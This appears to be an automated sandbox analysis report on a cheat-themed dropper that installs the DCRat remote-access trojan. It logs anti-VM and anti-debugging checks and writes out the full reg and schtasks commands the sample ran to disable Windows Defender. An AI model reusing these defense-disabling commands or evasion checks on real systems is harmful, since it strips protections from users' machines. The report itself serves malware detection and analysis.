                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe RDTSC instruction interceptor: First address: 174113A second address: 17B2FE5 instructions: 0x00000000 rdtsc 0x00000002 rol cl, 1 0x00000004 sbb eax, 63AF11CCh 0x00000009 xor bl, cl 0x0000000b seto dl 0x0000000e shrd edx, esp, 0000004Ch 0x00000012 mov eax, dword ptr [esp+ecx] 0x00000015 sub esi, 00000004h 0x0000001b cmc 0x0000001c mov dword ptr [esi], eax 0x0000001e bswap dx 0x00000021 sub ebp, 00000004h 0x00000027 mov edx, 671105E1h 0x0000002c ror dh, cl 0x0000002e and dx, bp 0x00000031 mov edx, dword ptr [ebp+00h] 0x00000035 clc 0x00000036 stc 0x00000037 jmp 00007F5F24C88A4Bh 0x0000003c xor edx, ebx 0x0000003e jmp 00007F5F24CDAF62h 0x00000043 dec edx 0x00000044 not edx 0x00000046 stc 0x00000047 sub edx, 6DFA0E04h 0x0000004d neg edx 0x0000004f test eax, ecx 0x00000051 xor ebx, edx 0x00000053 test edi, eax 0x00000055 test ebx, 24170DC1h 0x0000005b cmp di, 69B9h 0x00000060 add edi, edx 0x00000062 jmp 00007F5F24A6BA81h 0x00000067 lea ecx, dword ptr [esp+60h] 0x0000006b cmc 0x0000006c cmp esi, 19ED38B6h 0x00000072 test si, 388Fh 0x00000077 cmp esi, ecx 0x00000079 ja 00007F5F24D6CE52h 0x0000007f jmp edi 0x00000081 mov ecx, dword ptr [esi] 0x00000083 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe RDTSC instruction interceptor: First address: 17C3D5D second address: 172F936 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push B8ADBE03h 0x00000008 call 00007F5F24B79827h 0x0000000d push ecx 0x0000000e mov cx, 3A58h 0x00000012 push esi 0x00000013 movsx esi, di 0x00000016 setbe cl 0x00000019 push ebx 0x0000001a push edx 0x0000001b jmp 00007F5F24BD4779h 0x00000020 push eax 0x00000021 cbw 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe RDTSC instruction interceptor: First address: 172F936 second address: 172F94F instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 push edi 0x00000004 bswap edi 0x00000006 lahf 0x00000007 pushfd 0x00000008 movzx dx, al 0x0000000c cwd 0x0000000e bt esi, edi 0x00000011 mov ecx, 00000000h 0x00000016 rcl bh, FFFFFF9Ah 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: B55C05 second address: BD240F instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 rol cl, 1 0x00000006 shrd dx, bp, 00000038h 0x0000000b or dx, 3F3Eh 0x00000010 add cl, 0000001Ah 0x00000013 jmp 00007F5F24C6D9E5h 0x00000018 neg cl 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 720750 second address: 720769 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 push edi 0x00000004 bswap edi 0x00000006 lahf 0x00000007 pushfd 0x00000008 movzx dx, al 0x0000000c cwd 0x0000000e bt esi, edi 0x00000011 mov ecx, 00000000h 0x00000016 rcl bh, FFFFFF9Ah 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 7427D9 second address: 7427DC instructions: 0x00000000 rdtsc 0x00000002 pop esi 0x00000003 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 718731 second address: 71873B instructions: 0x00000000 rdtsc 0x00000002 setbe al 0x00000005 pop ebx 0x00000006 movsx dx, dh 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 71873B second address: 720750 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 movzx eax, dx 0x00000006 mov edx, 46DB0D08h 0x0000000b cmovnl edi, edx 0x0000000e pop edi 0x0000000f cwde 0x00000010 movzx edx, dx 0x00000013 jmp 00007F5F24C0A6FFh 0x00000018 pop edx 0x00000019 lahf 0x0000001a cbw 0x0000001c movzx ax, al 0x00000020 pop eax 0x00000021 pop ecx 0x00000022 movzx esi, ax 0x00000025 pop esi 0x00000026 jmp 00007F5F248C05A2h 0x0000002b ret 0x0000002c push 383489E9h 0x00000031 call 00007F5F24847432h 0x00000036 push ecx 0x00000037 mov cx, 3A58h 0x0000003b push esi 0x0000003c movsx esi, di 0x0000003f setbe cl 0x00000042 push ebx 0x00000043 push edx 0x00000044 jmp 00007F5F248253E5h 0x00000049 push eax 0x0000004a cbw 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 6FCFCD second address: 6FCFD5 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 xchg edi, ecx 0x00000005 pop ebp 0x00000006 xchg eax, edx 0x00000007 pop edi 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSpecial instruction interceptor: First address: F79280 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSpecial instruction interceptor: First address: EF62C9 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSpecial instruction interceptor: First address: 17C3D5D instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSpecial instruction interceptor: First address: 18C35B6 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: 239BBC40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMemory allocated: 239D54C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\blockweb\portrefNet.exeMemory allocated: AA0000 memory reserve | memory write watch
                        Source: C:\blockweb\portrefNet.exeMemory allocated: 1A560000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\blockweb\portrefNet.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\blockweb\portrefNet.exeWindow / User API: threadDelayed 1264
                        Source: C:\blockweb\portrefNet.exeWindow / User API: threadDelayed 641
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 5568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 2000Thread sleep count: 262 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 2000Thread sleep count: 236 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 4520Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 8156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\blockweb\portrefNet.exe TID: 7572Thread sleep count: 1264 > 30
                        Source: C:\blockweb\portrefNet.exe TID: 7584Thread sleep count: 641 > 30
                        Source: C:\blockweb\portrefNet.exe TID: 7540Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\blockweb\portrefNet.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0073A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,35_2_0073A5F4
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,35_2_0074B8E0
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 35_2_0074DD72 VirtualQuery,GetSystemInfo,35_2_0074DD72
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\blockweb\portrefNet.exeThread delayed: delay time: 922337203685477
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\Documents\desktop.ini
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData\Local\Temp
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\Desktop\desktop.ini
                        Source: C:\blockweb\portrefNet.exeFile opened: C:\Users\user\AppData\Local
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vboxtray
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vboxservice
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: qemu-ga
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmwareuser
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmusrvc
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmwareservice+discordtokenprotector
                        Source: wscript.exe, 00000025.00000003.1899504654.0000000000B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmsrvc
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmtoolsd
                        Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmwaretray
                        Source: wscript.exe, 00000025.00000003.1899504654.0000000000B0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
                        Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: 52cheatand52rat.exe, 00000024.00000002.1872950958.00000239BBA11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAPI call chain: ExitProcess graph end nodegraph_35-24332
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Thread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Thread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | System information queried: KernelDebuggerInformation
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Process queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Process queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Process queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Process queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075753D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075B710 GetProcessHeap
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process token adjusted: Debug
                        Source: C:\blockweb\portrefNet.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074F063 SetUnhandledExceptionFilter
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\SysWOW64\reg.exe | Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exe | Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\blockweb\portrefNet.exe "C:\blockweb\portrefNet.exe"
                        Source: C:\blockweb\portrefNet.exe | Process created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074ED5B cpuid
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: GetLocaleInfoW,GetNumberFormatW,35_2_0074A63C
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe VolumeInformation
                        Source: C:\blockweb\portrefNet.exe | Queries volume information: C:\blockweb\portrefNet.exe VolumeInformation
                        Source: C:\blockweb\portrefNet.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073ACF5 GetVersionExW
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiSpyware 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiVirus 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine | Registry value created: MpEnablePus 0
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableBehaviorMonitoring 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableIOAVProtection 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableOnAccessProtection 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRealtimeMonitoring 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableScanOnRealtimeEnable 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting | Registry value created: DisableEnhancedNotifications 1
                        Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet | Registry value created: DisableBlockAtFirstSeen 1

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                        Source: Yara match | File source: 0000002C.00000002.1947296388.0000000002774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002C.00000002.1947296388.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: portrefNet.exe PID: 7300, type: MEMORYSTR
                        Source: Yara match | File source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
